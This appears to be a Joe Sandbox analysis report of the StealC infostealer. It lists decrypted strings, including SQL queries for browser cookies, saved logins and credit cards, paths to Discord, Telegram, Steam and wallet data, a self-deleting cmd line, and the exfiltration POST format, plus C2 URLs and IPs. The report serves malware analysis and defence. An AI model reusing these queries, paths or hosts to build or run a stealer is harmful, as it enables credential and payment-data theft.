Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: Network
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: cookies
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: .txt
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: TRUE
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: FALSE
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: autofill
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: SELECT name, value FROM autofill
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: history
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: cc
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: name:
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: month:
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: year:
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: card:
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: Cookies
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: Login Data
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: Web Data
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: History
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: logins.json
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: formSubmitURL
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: usernameField
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: encryptedUsername
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: encryptedPassword
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: guid
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: cookies.sqlite
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: formhistory.sqlite
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: places.sqlite
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: plugins
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: Local Extension Settings
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: Sync Extension Settings
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: IndexedDB
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: Opera Stable
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: Opera GX Stable
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: CURRENT
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: chrome-extension_
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: _0.indexeddb.leveldb
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: Local State
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: profiles.ini
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: chrome
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: opera
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: firefox
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: wallets
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: %08lX%04lX%lu
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: ProductName
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: x32
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: x64
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: ProcessorNameString
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: DisplayName
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: DisplayVersion
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: Network Info:
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: - IP: IP?
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: - Country: ISO?
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: System Summary:
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: - HWID:
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: - OS:
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: - Architecture:
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: - UserName:
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: - Computer Name:
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: - Local Time:
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: - UTC:
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: - Language:
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: - Keyboards:
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: - Laptop:
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: - Running Path:
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: - CPU:
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: - Threads:
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: - Cores:
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: - RAM:
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: - Display Resolution:
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: - GPU:
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: User Agents:
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: Installed Apps:
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: All Users:
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: Current User:
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: Process List:
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: system_info.txt
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: freebl3.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: mozglue.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: msvcp140.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: nss3.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: softokn3.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: vcruntime140.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: \Temp\
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: .exe
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: runas
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: open
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: /c start
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: %DESKTOP%
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: %APPDATA%
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: %LOCALAPPDATA%
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: %USERPROFILE%
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: %DOCUMENTS%
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: %PROGRAMFILES%
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: %PROGRAMFILES_86%
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: %RECENT%
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: *.lnk
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: files
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: \discord\
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: \Local Storage\leveldb
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: \Telegram Desktop\
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: key_datas
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: D877F783D5D3EF8C*
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: map*
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: A7FDF864FBC10B77*
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: F8806DD0C461824F*
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: Telegram
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: Tox
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: *.tox
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: *.ini
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: Password
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: 00000001
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: 00000002
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: 00000003
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: 00000004
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: \Outlook\accounts.txt
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: Pidgin
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: \.purple\
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: accounts.xml
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: dQw4w9WgXcQ
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: token:
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: Software\Valve\Steam
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: SteamPath
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: \config\
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: ssfn*
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: config.vdf
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: DialogConfig.vdf
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: libraryfolders.vdf
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: loginusers.vdf
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: \Steam\
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: sqlite3.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: browsers
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: done
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: soft
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: \Discord\tokens.txt
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: https
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: POST
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: HTTP/1.1
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: hwid
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: build
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: token
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: file_name
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: file
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: message
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 17.2.stealc_default2.exe.770000.0.unpack	String decryptor: screenshot.jpg

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_00779B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	17_2_00779B60
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_0077C820 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcatA,lstrcatA,PK11_FreeSlot,lstrcatA,	17_2_0077C820
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_00777240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	17_2_00777240
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_00779AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	17_2_00779AC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_00788EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	17_2_00788EA0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8DA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	17_2_6C8DA9A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8D44C0 PK11_PubEncrypt,	17_2_6C8D44C0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8A4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	17_2_6C8A4420
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8D4440 PK11_PrivDecrypt,	17_2_6C8D4440
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C9225B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	17_2_6C9225B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8BE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	17_2_6C8BE6E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8DA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	17_2_6C8DA650
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8B8670 PK11_ExportEncryptedPrivKeyInfo,	17_2_6C8B8670
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8FA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	17_2_6C8FA730
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C900180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	17_2_6C900180
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8D43B0 PK11_PubEncryptPKCS1,PR_SetError,	17_2_6C8D43B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8F7C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	17_2_6C8F7C00
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8FBD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	17_2_6C8FBD30
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8B7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	17_2_6C8B7D60
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8F9EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	17_2_6C8F9EC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8D3FF0 PK11_PrivDecryptPKCS1,	17_2_6C8D3FF0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8D9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,	17_2_6C8D9840
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8D3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	17_2_6C8D3850
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8FDA40 SEC_PKCS7ContentIsEncrypted,	17_2_6C8FDA40

Source: Offnewhere.exe, 00000012.00000000.1986602049.000000000061B000.00000002.00000001.01000000.0000000A.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_97afe801-3

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: mozglue.pdbP source: stealc_default2.exe, 00000011.00000002.2209960916.000000006D1DD000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: nss3.pdb@ source: stealc_default2.exe, 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: nss3.pdb source: stealc_default2.exe, 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: mozglue.pdb source: stealc_default2.exe, 00000011.00000002.2209960916.000000006D1DD000.00000002.00000001.01000000.0000000E.sdmp

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_0077E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	17_2_0077E430
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_00784910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	17_2_00784910
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_0077BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	17_2_0077BE70
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_007716D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	17_2_007716D0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_0077F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	17_2_0077F6B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_00783EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	17_2_00783EA0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_0077DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	17_2_0077DA80
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_007838B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	17_2_007838B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_00784570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	17_2_00784570
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_0077ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	17_2_0077ED20
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_0077DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	17_2_0077DE10

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.17/2fb6c2cc8dce150a.php
Source: Malware configuration extractor	URLs: computeryrati.site
Source: Malware configuration extractor	URLs: faulteyotk.site
Source: Malware configuration extractor	URLs: contemteny.site
Source: Malware configuration extractor	URLs: authorisev.site
Source: Malware configuration extractor	URLs: servicedny.site
Source: Malware configuration extractor	URLs: goalyfeastz.site
Source: Malware configuration extractor	URLs: opposezmny.site
Source: Malware configuration extractor	URLs: seallysl.site
Source: Malware configuration extractor	URLs: dilemmadu.site
Source: Malware configuration extractor	URLs: http://185.215.113.17/2fb6c2cc8dce150a.php
Source: Malware configuration extractor	IPs: 185.215.113.16
Source: Malware configuration extractor	URLs: sevjoi17sr.top
Source: Malware configuration extractor	URLs: home.sevjoi17sr.top
Source: Malware configuration extractor	URLs: 0/80/home.sevjoi17sr.top

Source: Joe Sandbox View	IP Address: 1.1.1.1 1.1.1.1
Source: Joe Sandbox View	IP Address: 20.101.57.9 20.101.57.9
Source: Joe Sandbox View	IP Address: 185.215.113.16 185.215.113.16

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 17_2_007760A0 InternetOpenA,StrCmpCA,InternetOpenUrlA,CreateFileA,InternetReadFile,WriteFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,

17_2_007760A0

Source: chrome.exe, 0000002B.00000003.2307590249.00002B3C00624000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2761183199.00002B3C0063C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2760490321.00002B3C0050D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
